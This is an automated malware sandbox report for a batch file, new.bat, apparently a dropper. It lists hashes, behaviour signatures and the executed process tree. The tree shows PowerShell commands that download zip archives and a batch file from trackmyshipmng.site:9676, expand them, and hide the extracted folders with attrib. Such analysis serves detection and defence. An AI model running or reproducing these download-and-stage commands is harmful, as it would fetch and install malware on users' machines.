Overview

overview

8

Static

static

1

new.bat

windows7-x64

8

new.bat

windows10-2004-x64

Resubmissions

15-08-2024 18:38

240815-xaelbs1hpj 10

15-08-2024 18:24

240815-w14sgawfrc 8

Analysis

  • max time kernel
    361s
  • max time network
    362s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    15-08-2024 18:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    new.bat

  • Size

    18.0MB

  • MD5

    35168f928a81982fc428113f484ea21e

  • SHA1

    2029d685911c351cea2857e12c1755df330e4978

  • SHA256

    496ba960a9fdf59b00191e7750cfc3940fe5a49610988799cbe3d9cc5d3f5344

  • SHA512

    4b2dc4e91c04180cb372460231e75270252f389231d759bcd96af05dbb479647d39e860e3f22dcf7041e8ec214a1a12125e8ccf52cd26f87d13ee163d58726ec

  • SSDEEP

    48:HmGJ3NlBmmTaQgTymDyb4J7rmxo6rmxoAbYk8OkeFhCaoe1aLHtZQ5ImvBSygyGV:H9FmmNfjwhSCu7OmLT7SkoLEu3S0yhr

Score
8/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Delays execution with timeout.exe 1 IoCs
    evasion
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
    evasion

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\new.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3068
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/DXJS.zip' -OutFile 'C:\Users\Admin\Downloads\DXJS.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\DXJS.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2860
    • C:\Windows\system32\timeout.exe
      timeout /t 5 REM Wait for extraction to finish (adjust timeout as needed)
      2⤵
      • Delays execution with timeout.exe
      PID:2664
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Python"
      2⤵
      • Views/modifies file attributes
      PID:2792
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/startupppp.bat' -OutFile 'C:\Users\Admin\Downloads\startupppp.bat' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2156
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://trackmyshipmng.site:9676/FTSP.zip' -OutFile 'C:\Users\Admin\Downloads\FTSP.zip' }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3032
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "& { Expand-Archive -Path 'C:\Users\Admin\Downloads\FTSP.zip' -DestinationPath 'C:\Users\Admin\Downloads' -Force }"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2644
    • C:\Windows\system32\attrib.exe
      attrib +h "C:\Users\Admin\Downloads\Print"
      2⤵
      • Views/modifies file attributes
      PID:2696

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    6dc2d9da0f8bcca40cf042ba71943219

    SHA1

    b0b6e95baff77ac0b1647a26cca553808e065352

    SHA256

    c268eb7be034b85b370e73efa29ddef098b2c97e92f9dd865d5d970c08699fb0

    SHA512

    5abfe232352c3fdd127f692134225fe46b9aa3349478b7b74911ce9ca2170a1145fe44b02f589e2997290b3d1117520bb74d39bf9f6d5360747d4319c0a7f74a

    Download Submit

  • memory/2428-11-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2428-10-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2428-9-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2428-8-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2428-7-0x000007FEF57F0000-0x000007FEF618D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2428-6-0x0000000002810000-0x0000000002818000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2428-5-0x000000001B620000-0x000000001B902000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2428-4-0x000007FEF5AAE000-0x000007FEF5AAF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2860-18-0x0000000002310000-0x0000000002318000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2860-17-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

    Filesize

    2.9MB

    Download